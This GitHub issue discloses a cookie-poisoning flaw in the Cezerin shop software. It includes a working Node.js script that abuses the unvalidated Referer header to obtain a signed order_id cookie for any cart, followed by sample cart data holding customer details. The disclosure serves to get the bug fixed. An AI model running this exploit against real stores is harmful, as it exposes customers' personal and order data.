[VULNERABILITY]: Cookie poisoning #499

Open
Baker68 opened this issue Jun 27, 2022 · 1 comment
Labels: bug (Something isn't working)

Baker68 commented Jun 27, 2022

When a customer visits Cezerin, two signed cookies are set: landing_url and referrer_url.
The referrer_url cookie is set (signed) with the value of the Referer header, but it's missing validation, so any value will be set.

script:

const axios = require("axios");
// 62b9728e9352df6441630054

let config = {
    headers: {
        'Host': 'plusha.cezerin.net',
        'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate, br',
        'Referer': process.argv[2],
        'Connection': 'keep-alive',
        'Upgrade-Insecure-Requests': '1',
        'Pragma': 'no-cache',
        'Cache-Control': 'no-cache'
    }
};
(async () => {
    await axios.get('https://plusha.cezerin.net/',  config)
        .then(data => console.log(`success : order_id=${data.headers['set-cookie'][0].split('=')[1].split(';')[0]}` ));
})();

Save the above file as cookie.js and execute it like so: node cookie.js 62b9728e9352df6441630054
The script will output something like this:

success : order_id=s%3A62b9728e9352df6441630054.x%2FwysOvDVq9nNwXO4N3tFmZpki7lvEHMgqtNAkAoTuw

Now that we have a valid signed order_id cookie, if we import that cookie in the browser, we will get access to the customer's cart, with all its details, and you can also perform an attack on the objectId, listing carts that contain customer data.

Sample output on GET https://plusha.cezerin.net/ajax/cart:

{
   "date_created":"2022-06-27T09:04:14.558Z",
   "date_placed":null,
   "date_updated":"2022-06-27T09:05:31.311Z",
   "date_closed":null,
   "date_paid":null,
   "date_cancelled":null,
   "number":1002,
   "shipping_status":"",
   "items":[
      {
         "product_image":[
            {
               "id":"5e1653f2f60c02051954ed72",
               "alt":"",
               "position":99,
               "filename":"cezerin.png",
               "url":"https://cezerin.net/images/products/5e1639ae0c86ec14224a4645/cezerin.png"
            }
         ],
         "id":"62b9728e9352df6441630055",
         "product_id":"5e1639ae0c86ec14224a4645",
         "variant_id":null,
         "quantity":2,
         "discount_total":0,
         "name":"Product A",
         "price":850,
         "price_total":1700,
         "sku":"product-a",
         "tax_class":null,
         "tax_total":0,
         "variant_name":"",
         "weight":0.5,
         "image_url":"https://cezerin.net/images/products/5e1639ae0c86ec14224a4645/cezerin.png",
         "path":"/category-a/product-a",
         "stock_quantity":10000
      }
   ],
   "transactions":[
      
   ],
   "discounts":[
      
   ],
   "billing_address":{
      "full_name":"",
      "address1":"",
      "address2":"",
      "city":"",
      "country":"",
      "postal_code":"",
      "state":"",
      "phone":"",
      "company":"",
      "tax_number":"",
      "coordinates":{
         "latitude":"",
         "longitude":""
      },
      "details":null
   },
   "shipping_address":{
      "full_name":"backer 68 ",
      "address1":"",
      "address2":"",
      "city":"",
      "country":"",
      "postal_code":"",
      "state":"",
      "phone":"",
      "company":"",
      "tax_number":"",
      "coordinates":{
         "latitude":"",
         "longitude":""
      },
      "details":null
   },
   "tax_rate":0,
   "shipping_tax":0,
   "shipping_discount":0,
   "shipping_price":0,
   "item_tax_included":true,
   "shipping_tax_included":true,
   "closed":false,
   "cancelled":false,
   "delivered":false,
   "paid":false,
   "hold":false,
   "draft":true,
   "first_name":"backer 68",
   "last_name":"",
   "password":"",
   "email":"baker68@email-test.com",
   "mobile":"+5 (555) 555-5555",
   "referrer_url":"https://cezerin.org/",
   "landing_url":"https://plusha.cezerin.net/",
   "channel":"",
   "note":"",
   "comments":"",
   "coupon":"",
   "tracking_number":"",
   "customer_id":null,
   "status_id":null,
   "payment_method_id":null,
   "shipping_method_id":"5e1639ae0c86ec14224a464e",
   "tags":[
      
   ],
   "id":"62b9728e9352df6441630054",
   "status":"",
   "shipping_method":"Courier",
   "payment_method":"",
   "payment_method_gateway":"",
   "weight_total":1,
   "discount_total":0,
   "subtotal":1700,
   "tax_included_total":0,
   "tax_total":0,
   "shipping_total":0,
   "grand_total":1700
}

The referrer_url value should be validated before being set.

@Baker68 Baker68 added the bug Something isn't working label Jun 27, 2022
@ekarailiev

I think in Cezerin2/src/api/server/ajaxRouter.ts

// maxAge: number        // here: comment for Session
httpOnly: true
signed: true
secure: boolean
sameSite: "lax"          // here: Lax

and

// maxAge: 24 * 60 * 60 * 1000, // 24 hours   // here: comment for Session
httpOnly: true,
signed: true,
secure: true,            // here: for Secure
sameSite: "lax",         // here: Lax
